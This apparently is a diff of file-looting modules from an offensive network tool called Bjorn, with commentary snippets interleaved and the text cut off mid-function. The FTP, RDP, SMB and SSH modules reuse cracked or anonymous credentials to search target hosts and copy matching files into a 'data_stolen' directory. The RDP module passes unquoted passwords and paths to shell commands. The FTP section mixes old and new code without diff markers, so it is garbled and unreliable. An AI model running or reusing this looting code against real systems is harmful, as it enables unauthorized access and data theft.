logger.error(f"Error downloading file {remote_file} from FTP: {e}")
logger.error(f"FTP download error {remote_file}: {e}")
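The recursion cap in `find_files` is easy to check in isolation; here the FTP tree is faked with nested dicts (dict = directory, anything else = file), so the traversal and match rules run without a server. Extensions and substrings below are sample values, not Bjorn's configured lists:

```python
import os

def find_files(tree, path="/", depth=0, max_depth=5,
               exts=(".csv", ".bak"), names=("password",)):
    # Depth-limited walk mirroring StealFilesFTP.find_files: recursing into
    # a dict plays the role of a successful ftp.cwd(); everything else is a
    # file candidate matched by extension or name substring.
    if depth > max_depth:
        return []
    out = []
    for item, node in tree.items():
        full = os.path.join(path, item)
        if isinstance(node, dict):
            out.extend(find_files(node, full, depth + 1, max_depth, exts, names))
        elif item.endswith(exts) or any(n in item for n in names):
            out.append(full)
    return out

tree = {"pub": {"export.csv": None, "readme.txt": None},
        "home": {"passwords.bak": None},
        "loop": {"loop": {}}}  # harmless here; the depth cap guards real loops
hits = sorted(find_files(tree))
```

A symlink loop on a real server would present as an ever-nesting directory, which the `depth > max_depth` guard cuts off instead of recursing forever.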
def execute(self, ip, port, row, status_key):
"""
Steal files from the FTP server.
"""
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
timer = None
try:
if 'success' in row.get(b_parent, {}).get(b_status, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesFTP"
logger.info(f"Stealing files from {ip}:{port}...")
# Wait a bit because it's too fast to see the status change
time.sleep(5)
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
# Get FTP credentials from the cracked passwords file
ftpfile = self.shared_data.ftpfile
credentials = []
if os.path.exists(ftpfile):
with open(ftpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4])) # Username and password
logger.info(f"Found {len(credentials)} credentials for {ip}")
hostname = self.hostname_for_ip(ip) or ""
self.shared_data.comment_params = {"ip": ip, "port": str(port_i), "hostname": hostname}
def try_anonymous_access():
"""
Try to access the FTP server without credentials.
"""
try:
ftp = self.connect_ftp(ip, 'anonymous', '')
return ftp
except Exception as e:
logger.info(f"Anonymous access to {ip} failed: {e}")
return None
creds = self._get_creds_for_target(ip, port_i)
logger.info(f"Found {len(creds)} FTP credentials in DB for {ip}")
if not credentials and not try_anonymous_access():
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def try_anonymous() -> Optional[FTP]:
return self.connect_ftp(ip, 'anonymous', '', port=port_i)
def timeout():
"""
Timeout function to stop the execution if no FTP connection is established.
"""
if not self.ftp_connected:
logger.error(f"No FTP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
if not creds and not try_anonymous():
logger.error(f"No FTP credentials for {ip}. Skipping.")
return 'failed'
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
def _timeout():
if not self.ftp_connected:
logger.error(f"No FTP connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
# Attempt anonymous access first
success = False
ftp = try_anonymous_access()
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/anonymous")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} via anonymous access")
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first
ftp = try_anonymous()
if ftp:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname}
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/anonymous")
if files:
self.shared_data.comment_params = {"user": "anonymous", "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.success(f"Stole {len(files)} files from {ip} via anonymous")
success = True
try:
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
# Attempt to steal files using each credential if anonymous access fails
for username, password in credentials:
if self.stop_execution:
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
ftp = self.connect_ftp(ip, username, password)
if ftp:
remote_files = self.find_files(ftp, '/')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"ftp/{mac}_{ip}/{username}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution:
break
self.steal_file(ftp, remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.info(f"Successfully stolen {countfiles} files from {ip}:{port} with user '{username}'")
ftp.quit()
if success:
timer.cancel() # Cancel the timer if the operation is successful
break # Exit the loop as we have found valid credentials
except Exception as e:
logger.error(f"Error stealing files from {ip} with user '{username}': {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
except Exception:
pass
if success:
return 'success'
# Authenticated creds
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname}
logger.info(f"Trying FTP {username} @ {ip}:{port_i}")
ftp = self.connect_ftp(ip, username, password, port=port_i)
if not ftp:
continue
files = self.find_files(ftp, '/')
local_dir = os.path.join(self.shared_data.data_stolen_dir, f"ftp/{mac}_{ip}/{username}")
if files:
self.shared_data.comment_params = {"user": username, "ip": ip, "port": str(port_i), "hostname": hostname, "files": str(len(files))}
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(ftp, remote, local_dir)
logger.info(f"Stole {len(files)} files from {ip} as {username}")
success = True
try:
ftp.quit()
except Exception:
pass
if success:
return 'success'
except Exception as e:
logger.error(f"FTP loot error {ip} {username}: {e}")
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_ftp = StealFilesFTP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")
finally:
if timer:
timer.cancel()

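The FTP looter above pulls candidate logins from the `creds` table by IP and by MAC, then de-duplicates (user, password) pairs while preserving order and dropping empty usernames. A minimal sketch of that dedup step (the row dicts below are illustrative, not actual DB output):

```python
# Sketch: order-preserving dedup of (user, password) rows, mirroring
# the pattern used by _get_creds_for_target. Row contents are made up.
from typing import Dict, List, Tuple

def dedup_creds(rows: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    seen = set()
    out: List[Tuple[str, str]] = []
    for row in rows:
        u = str(row.get("user") or "").strip()
        p = str(row.get("password") or "").strip()
        if not u or (u, p) in seen:  # skip empty users and repeats
            continue
        seen.add((u, p))
        out.append((u, p))
    return out

rows = [
    {"user": "admin", "password": "ftp123"},
    {"user": "admin", "password": "ftp123"},   # duplicate from the by-MAC query
    {"user": "", "password": "x"},             # empty user is skipped
    {"user": "backup", "password": "hunter2"},
]
print(dedup_creds(rows))  # → [('admin', 'ftp123'), ('backup', 'hunter2')]
```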

@@ -1,184 +0,0 @@
"""
steal_files_rdp.py - This script connects to remote RDP servers using provided credentials, searches for specific files, and downloads them to a local directory.
"""
import os
import subprocess
import logging
import time
from threading import Timer
from rich.console import Console
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_rdp.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesRDP"
b_module = "steal_files_rdp"
b_status = "steal_files_rdp"
b_parent = "RDPBruteforce"
b_port = 3389
class StealFilesRDP:
"""
Class to handle the process of stealing files from RDP servers.
"""
def __init__(self, shared_data):
try:
self.shared_data = shared_data
self.rdp_connected = False
self.stop_execution = False
logger.info("StealFilesRDP initialized")
except Exception as e:
logger.error(f"Error during initialization: {e}")
def connect_rdp(self, ip, username, password):
"""
Establish an RDP connection.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("RDP connection attempt interrupted due to orchestrator exit.")
return None
command = f"xfreerdp /v:{ip} /u:{username} /p:{password} /drive:shared,/mnt/shared"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.info(f"Connected to {ip} via RDP with username {username}")
self.rdp_connected = True
return process
else:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {stderr.decode()}")
return None
except Exception as e:
logger.error(f"Error connecting to RDP on {ip} with username {username}: {e}")
return None
def find_files(self, client, dir_path):
"""
Find files in the remote directory based on the configuration criteria.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File search interrupted due to orchestrator exit.")
return []
# Assuming that files are mounted and can be accessed via SMB or locally
files = []
for root, dirs, filenames in os.walk(dir_path):
for file in filenames:
if any(file.endswith(ext) for ext in self.shared_data.steal_file_extensions) or \
any(file_name in file for file_name in self.shared_data.steal_file_names):
files.append(os.path.join(root, file))
logger.info(f"Found {len(files)} matching files in {dir_path}")
return files
except Exception as e:
logger.error(f"Error finding files in directory {dir_path}: {e}")
return []
def steal_file(self, remote_file, local_dir):
"""
Download a file from the remote server to the local directory.
"""
try:
if self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
return
local_file_path = os.path.join(local_dir, os.path.basename(remote_file))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
command = f"cp {remote_file} {local_file_path}"
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
logger.success(f"Downloaded file from {remote_file} to {local_file_path}")
else:
logger.error(f"Error downloading file {remote_file}: {stderr.decode()}")
except Exception as e:
logger.error(f"Error stealing file {remote_file}: {e}")
def execute(self, ip, port, row, status_key):
"""
Steal files from the remote server using RDP.
"""
try:
if 'success' in row.get(self.b_parent_action, ''): # Verify if the parent action is successful
self.shared_data.bjornorch_status = "StealFilesRDP"
# Wait a bit because it's too fast to see the status change
time.sleep(5)
logger.info(f"Stealing files from {ip}:{port}...")
# Get RDP credentials from the cracked passwords file
rdpfile = self.shared_data.rdpfile
credentials = []
if os.path.exists(rdpfile):
with open(rdpfile, 'r') as f:
lines = f.readlines()[1:] # Skip the header
for line in lines:
parts = line.strip().split(',')
if parts[1] == ip:
credentials.append((parts[3], parts[4]))
logger.info(f"Found {len(credentials)} credentials for {ip}")
if not credentials:
logger.error(f"No valid credentials found for {ip}. Skipping...")
return 'failed'
def timeout():
"""
Timeout function to stop the execution if no RDP connection is established.
"""
if not self.rdp_connected:
logger.error(f"No RDP connection established within 4 minutes for {ip}. Marking as failed.")
self.stop_execution = True
timer = Timer(240, timeout) # 4 minutes timeout
timer.start()
# Attempt to steal files using each credential
success = False
for username, password in credentials:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Steal files execution interrupted due to orchestrator exit.")
break
try:
logger.info(f"Trying credential {username}:{password} for {ip}")
client = self.connect_rdp(ip, username, password)
if client:
remote_files = self.find_files(client, '/mnt/shared')
mac = row['MAC Address']
local_dir = os.path.join(self.shared_data.datastolendir, f"rdp/{mac}_{ip}")
if remote_files:
for remote_file in remote_files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("File stealing process interrupted due to orchestrator exit.")
break
self.steal_file(remote_file, local_dir)
success = True
countfiles = len(remote_files)
logger.success(f"Successfully stolen {countfiles} files from {ip}:{port} using {username}")
client.terminate()
if success:
timer.cancel() # Cancel the timer if the operation is successful
return 'success' # Return success if the operation is successful
except Exception as e:
logger.error(f"Error stealing files from {ip} with username {username}: {e}")
# Ensure the action is marked as failed if no files were found
if not success:
logger.error(f"Failed to steal any files from {ip}:{port}")
return 'failed'
else:
logger.error(f"Parent action not successful for {ip}. Skipping steal files action.")
return 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_rdp = StealFilesRDP(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

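The removed RDP looter's `find_files` selected a file when its name either ended with a configured extension or contained a configured name fragment. A small sketch of that predicate, with hypothetical lists standing in for `shared_data.steal_file_extensions` and `shared_data.steal_file_names`:

```python
# Sketch of the find_files match rule: suffix match OR substring match.
# The two lists are illustrative placeholders, not the project's config.
steal_file_extensions = [".kdbx", ".sqlite", ".pem"]
steal_file_names = ["password", "secret"]

def matches(filename: str) -> bool:
    return any(filename.endswith(ext) for ext in steal_file_extensions) or \
           any(frag in filename for frag in steal_file_names)

print(matches("vault.kdbx"))        # → True  (extension match)
print(matches("my_passwords.txt"))  # → True  (name-fragment match)
print(matches("notes.txt"))         # → False
```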

@@ -1,223 +1,252 @@
"""
steal_files_smb.py — SMB file looter (DB-backed).
SQL mode:
- Orchestrator provides (ip, port) after parent success (SMBBruteforce).
- DB.creds (service='smb') provides credentials; 'database' column stores share name.
- Also try anonymous (''/'').
- Output under: {data_stolen_dir}/smb/{mac}_{ip}/{share}/...
"""
import os
import logging
from rich.console import Console
from threading import Timer
import time
from typing import List, Tuple, Dict, Optional
from smb.SMBConnection import SMBConnection
from smb.base import SharedFile
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="steal_files_smb.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "StealFilesSMB"
b_module = "steal_files_smb"
b_status = "steal_files_smb"
b_parent = "SMBBruteforce"
b_port = 445
class StealFilesSMB:
"""
Class to handle the process of stealing files from SMB shares.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self.smb_connected = False
self.stop_execution = False
self.IGNORED_SHARES = set(self.shared_data.ignored_smb_shares or [])
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSMB initialized")
# -------- Identity cache --------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# -------- Creds (grouped by share) --------
def _get_creds_by_share(self, ip: str, port: int) -> Dict[str, List[Tuple[str, str]]]:
"""
Establish an SMB connection.
Returns {share: [(user,pass), ...]} from DB.creds (service='smb', database=share).
Prefer IP; also include MAC if known. Dedup per share.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
by_ip = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(ip,'')=:ip
AND (port IS NULL OR port=:port)
""", params)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user","password","database"
FROM creds
WHERE service='smb'
AND COALESCE(mac_address,'')=:mac
AND (port IS NULL OR port=:port)
""", params)
out: Dict[str, List[Tuple[str, str]]] = {}
seen: Dict[str, set] = {}
for row in (by_ip + by_mac):
share = str(row.get("database") or "").strip()
user = str(row.get("user") or "").strip()
pwd = str(row.get("password") or "").strip()
if not user or not share:
continue
if share not in out:
out[share], seen[share] = [], set()
if (user, pwd) in seen[share]:
continue
seen[share].add((user, pwd))
out[share].append((user, pwd))
return out
# -------- SMB helpers --------
def connect_smb(self, ip: str, username: str, password: str) -> Optional[SMBConnection]:
try:
conn = SMBConnection(username, password, "Bjorn", "Target", use_ntlm_v2=True, is_direct_tcp=True)
conn.connect(ip, 445)
logger.info(f"Connected to {ip} via SMB with username {username}")
conn.connect(ip, b_port)
self.smb_connected = True
logger.info(f"Connected SMB {ip} as {username}")
return conn
except Exception as e:
logger.error(f"SMB connection error for {ip} with user '{username}' and password '{password}': {e}")
logger.error(f"SMB connect error {ip} {username}: {e}")
return None
def list_shares(self, conn: SMBConnection):
try:
shares = conn.listShares()
valid_shares = [share for share in shares if share.name not in IGNORED_SHARES and not share.isSpecial and not share.isTemporary]
logger.info(f"Found valid shares: {[share.name for share in valid_shares]}")
return valid_shares
return [s for s in shares if (s.name not in self.IGNORED_SHARES and not s.isSpecial and not s.isTemporary)]
except Exception as e:
logger.error(f"Error listing shares: {e}")
logger.error(f"list_shares error: {e}")
return []
def find_files(self, conn: SMBConnection, share: str, dir_path: str) -> List[str]:
files: List[str] = []
try:
for entry in conn.listPath(share, dir_path):
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
if entry.isDirectory:
if entry.filename not in ('.', '..'):
files.extend(self.find_files(conn, share, os.path.join(dir_path, entry.filename)))
else:
name = entry.filename
if any(name.endswith(ext) for ext in (self.shared_data.steal_file_extensions or [])) or \
any(sn in name for sn in (self.shared_data.steal_file_names or [])):
files.append(os.path.join(dir_path, name))
return files
except Exception as e:
logger.error(f"SMB path error {share}:{dir_path}: {e}")
raise
def steal_file(self, conn: SMBConnection, share: str, remote_file: str, base_dir: str) -> None:
try:
local_file_path = os.path.join(base_dir, os.path.relpath(remote_file, '/'))
os.makedirs(os.path.dirname(local_file_path), exist_ok=True)
with open(local_file_path, 'wb') as f:
conn.retrieveFile(share, remote_file, f)
logger.success(f"Downloaded {share}:{remote_file} -> {local_file_path}")
except Exception as e:
logger.error(f"SMB download error {share}:{remote_file}: {e}")
# -------- Orchestrator entry --------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
try:
self.shared_data.bjorn_orch_status = b_class
try:
port_i = int(port)
except Exception:
port_i = b_port
creds_by_share = self._get_creds_by_share(ip, port_i)
logger.info(f"Found SMB creds for {len(creds_by_share)} share(s) in DB for {ip}")
def _timeout():
if not self.smb_connected:
logger.error(f"No SMB connection within 4 minutes for {ip}. Failing.")
self.stop_execution = True
timer = Timer(240, _timeout)
timer.start()
mac = (row or {}).get("MAC Address") or self.mac_for_ip(ip) or "UNKNOWN"
success = False
# Anonymous first (''/'')
try:
conn = self.connect_smb(ip, '', '')
if conn:
shares = self.list_shares(conn)
for s in shares:
files = self.find_files(conn, s.name, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{s.name}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, s.name, remote, base)
logger.success(f"Stole {len(files)} files from {ip} via anonymous on {s.name}")
success = True
try:
conn.close()
except Exception:
pass
except Exception as e:
logger.info(f"Anonymous SMB failed on {ip}: {e}")
if success:
timer.cancel()
return 'success'
# Per-share credentials
for share, creds in creds_by_share.items():
if share in self.IGNORED_SHARES:
continue
for username, password in creds:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
try:
conn = self.connect_smb(ip, username, password)
if not conn:
continue
files = self.find_files(conn, share, '/')
if files:
base = os.path.join(self.shared_data.data_stolen_dir, f"smb/{mac}_{ip}/{share}")
for remote in files:
if self.stop_execution or self.shared_data.orchestrator_should_exit:
logger.info("Execution interrupted.")
break
self.steal_file(conn, share, remote, base)
logger.info(f"Stole {len(files)} files from {ip} share={share} as {username}")
success = True
try:
conn.close()
except Exception:
pass
if success:
timer.cancel()
return 'success'
except Exception as e:
logger.error(f"SMB loot error {ip} {share} {username}: {e}")
timer.cancel()
return 'success' if success else 'failed'
except Exception as e:
logger.error(f"Unexpected error during execution for {ip}:{port}: {e}")
return 'failed'
if __name__ == "__main__":
try:
shared_data = SharedData()
steal_files_smb = StealFilesSMB(shared_data)
# Add test or demonstration calls here
except Exception as e:
logger.error(f"Error in main execution: {e}")

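`steal_file` in the SMB looter mirrors the remote path under the local loot directory using `os.path.relpath(remote_file, '/')`, so the share's directory tree is preserved on disk. A quick sketch of the resulting layout (the base directory value is an assumption for illustration):

```python
# Sketch: how a remote SMB path maps onto the local loot tree.
import os

base = "data_stolen/smb/AA-BB_192.168.1.10/Public"  # {data_stolen_dir}/smb/{mac}_{ip}/{share}
remote_file = "/docs/hr/salaries.xlsx"

# relpath strips the leading '/', join re-roots it under base
local_file_path = os.path.join(base, os.path.relpath(remote_file, "/"))
print(local_file_path)
# → data_stolen/smb/AA-BB_192.168.1.10/Public/docs/hr/salaries.xlsx (POSIX)
```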

@@ -1,173 +1,356 @@
"""
steal_files_ssh.py — SSH file looter (DB-backed)
SQL mode:
- Orchestrator provides (ip, port) and ensures parent action success (SSHBruteforce).
- SSH credentials are read from the DB table `creds` (service='ssh').
- IP -> (MAC, hostname) mapping is read from the DB table `hosts`.
- Looted files are saved under: {shared_data.data_stolen_dir}/ssh/{mac}_{ip}/...
- Paramiko logs are silenced to avoid noisy banners/tracebacks.
Parent gate:
- Orchestrator enforces parent success (b_parent='SSHBruteforce').
- This action runs once per eligible target (alive, open port, parent OK).
"""
import os
import paramiko
import logging
import time
from rich.console import Console
from threading import Timer
from typing import List, Tuple, Dict, Optional
from shared import SharedData
from logger import Logger
# Logger for this module
logger = Logger(name="steal_files_ssh.py", level=logging.DEBUG)
# Silence Paramiko's internal logs (no "Error reading SSH protocol banner" spam)
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
b_class = "StealFilesSSH" # Unique action identifier
b_module = "steal_files_ssh" # Python module name (this file without .py)
b_status = "steal_files_ssh" # Human/readable status key (free form)
b_action = "normal" # 'normal' (per-host) or 'global'
b_service = ["ssh"] # Services this action is about (JSON-ified by sync_actions)
b_port = 22 # Preferred target port (used if present on host)
# Trigger strategy:
# - Prefer to run as soon as SSH credentials exist for this MAC (on_cred_found:ssh).
# - Also allow starting when the host exposes SSH (on_service:ssh),
# but the requirements below still enforce that SSH creds must be present.
b_trigger = 'on_any:["on_cred_found:ssh","on_service:ssh"]'
# Requirements (JSON string):
# - must have SSH credentials on this MAC
# - must have port 22 (legacy fallback if port_services is missing)
# - limit concurrent running actions system-wide to 2 for safety
b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
# Scheduling / limits
b_priority = 70 # 0..100 (higher processed first in this schema)
b_timeout = 900 # seconds before a pending queue item expires
b_max_retries = 1 # minimal retries; avoid noisy re-runs
b_cooldown = 86400 # seconds (per-host cooldown between runs)
b_rate_limit = "3/86400" # at most 3 executions/day per host (extra guard)
# Risk / hygiene
b_stealth_level = 6 # 1..10 (higher = more stealthy)
b_risk_level = "high" # 'low' | 'medium' | 'high'
b_enabled = 1 # set to 0 to disable from DB sync
# Tags (free taxonomy, JSON-ified by sync_actions)
b_tags = ["exfil", "ssh", "loot"]
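The `b_requires` string above is a JSON clause list that the orchestrator evaluates before queueing the action. The evaluator itself is not part of this diff, so the following is only a hypothetical sketch of how an `{"all":[...]}` spec could be checked (host dict shape and clause semantics are assumptions):

```python
# Hypothetical evaluator for a b_requires spec -- NOT the orchestrator's
# real implementation, just an illustration of the clause structure.
import json

def requires_met(spec_json: str, host: dict, running: int) -> bool:
    spec = json.loads(spec_json)
    def check(clause: dict) -> bool:
        if "has_cred" in clause:        # creds of this service exist for the host
            return clause["has_cred"] in host.get("creds", [])
        if "has_port" in clause:        # host exposes this port
            return clause["has_port"] in host.get("ports", [])
        if "max_concurrent" in clause:  # system-wide running-action cap
            return running < clause["max_concurrent"]
        return False
    return all(check(c) for c in spec.get("all", []))

b_requires = '{"all":[{"has_cred":"ssh"},{"has_port":22},{"max_concurrent":2}]}'
host = {"creds": ["ssh"], "ports": [22, 80]}
print(requires_met(b_requires, host, running=1))  # → True
print(requires_met(b_requires, host, running=2))  # → False (cap reached)
```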
class StealFilesSSH:
"""StealFilesSSH: connects via SSH using known creds and downloads matching files."""
def __init__(self, shared_data: SharedData):
"""Init: store shared_data, flags, and build an IP->(MAC, hostname) cache."""
self.shared_data = shared_data
self.sftp_connected = False # flipped to True on first SFTP open
self.stop_execution = False # global kill switch (timer / orchestrator exit)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
logger.info("StealFilesSSH initialized")
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
"""Return MAC for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
"""Return current hostname for IP using the local cache (refresh on miss)."""
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Credentials (creds table) ---------------------
def _get_creds_for_target(self, ip: str, port: int) -> List[Tuple[str, str]]:
"""
Fetch SSH creds for this target from DB.creds.
Strategy:
- Prefer rows where service='ssh' AND ip=target_ip AND (port is NULL or matches).
- Also include rows for same MAC (if known), still service='ssh'.
Returns list of (username, password), deduplicated.
"""
mac = self.mac_for_ip(ip)
params = {"ip": ip, "port": port, "mac": mac or ""}
# Pull by IP
by_ip = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(ip,'') = :ip
AND (port IS NULL OR port = :port)
""",
params
)
# Pull by MAC (if we have one)
by_mac = []
if mac:
by_mac = self.shared_data.db.query(
"""
SELECT "user", "password"
FROM creds
WHERE service='ssh'
AND COALESCE(mac_address,'') = :mac
AND (port IS NULL OR port = :port)
""",
params
)
# Deduplicate while preserving order
seen = set()
out: List[Tuple[str, str]] = []
for row in (by_ip + by_mac):
u = str(row.get("user") or "").strip()
p = str(row.get("password") or "").strip()
if not u or (u, p) in seen:
continue
seen.add((u, p))
out.append((u, p))
return out
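The order-preserving dedup above (IP-matched rows first, then MAC-matched rows) can be exercised in isolation; the `rows` here are stand-in dicts, not real DB results:

```python
from typing import Dict, List, Tuple

def dedup_creds(rows: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Deduplicate (user, password) pairs, keeping first-seen order."""
    seen = set()
    out: List[Tuple[str, str]] = []
    for row in rows:
        u = str(row.get("user") or "").strip()
        p = str(row.get("password") or "").strip()
        if not u or (u, p) in seen:
            continue  # skip empty users and exact repeats
        seen.add((u, p))
        out.append((u, p))
    return out

by_ip = [{"user": "root", "password": "toor"}, {"user": "pi", "password": "raspberry"}]
by_mac = [{"user": "root", "password": "toor"}, {"user": "admin", "password": ""}]
print(dedup_creds(by_ip + by_mac))
# [('root', 'toor'), ('pi', 'raspberry'), ('admin', '')]
```

Because IP rows are concatenated first, an IP-scoped credential always wins ties over the same pair found via MAC.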
# --------------------- SSH helpers ---------------------
def connect_ssh(self, ip: str, username: str, password: str, port: int = b_port, timeout: int = 10):
"""
Open an SSH connection (no agent, no keys). Returns an active SSHClient or raises.
NOTE: Paramiko logs are silenced at module import level.
"""
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Be explicit: no interactive agents/keys; bounded timeouts to avoid hangs
ssh.connect(
hostname=ip,
username=username,
password=password,
port=port,
timeout=timeout,
auth_timeout=timeout,
banner_timeout=timeout,
allow_agent=False,
look_for_keys=False,
)
logger.info(f"Connected to {ip} via SSH as {username}")
return ssh
def find_files(self, ssh: paramiko.SSHClient, dir_path: str) -> List[str]:
"""
List candidate files from remote dir, filtered by config:
- shared_data.steal_file_extensions (endswith)
- shared_data.steal_file_names (substring match)
Uses `find <dir> -type f 2>/dev/null` to keep it quiet.
"""
# Quiet 'permission denied' messages via redirection
cmd = f'find {dir_path} -type f 2>/dev/null'
stdin, stdout, stderr = ssh.exec_command(cmd)
files = (stdout.read().decode(errors="ignore") or "").splitlines()
exts = set(self.shared_data.steal_file_extensions or [])
names = set(self.shared_data.steal_file_names or [])
if not exts and not names:
# If no filters are defined, do nothing (too risky to pull everything).
logger.warning("No steal_file_extensions / steal_file_names configured — skipping.")
return []
matches: List[str] = []
for fpath in files:
if self.shared_data.orchestrator_should_exit or self.stop_execution:
logger.info("File search interrupted.")
return []
fname = os.path.basename(fpath)
if (exts and any(fname.endswith(ext) for ext in exts)) or (names and any(sn in fname for sn in names)):
matches.append(fpath)
logger.info(f"Found {len(matches)} matching files in {dir_path}")
return matches
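The extension/substring filter used above can be sketched on its own; the sample paths and filter sets below are illustrative, not the project defaults:

```python
import os
from typing import Iterable, List, Set

def match_loot(paths: Iterable[str], exts: Set[str], names: Set[str]) -> List[str]:
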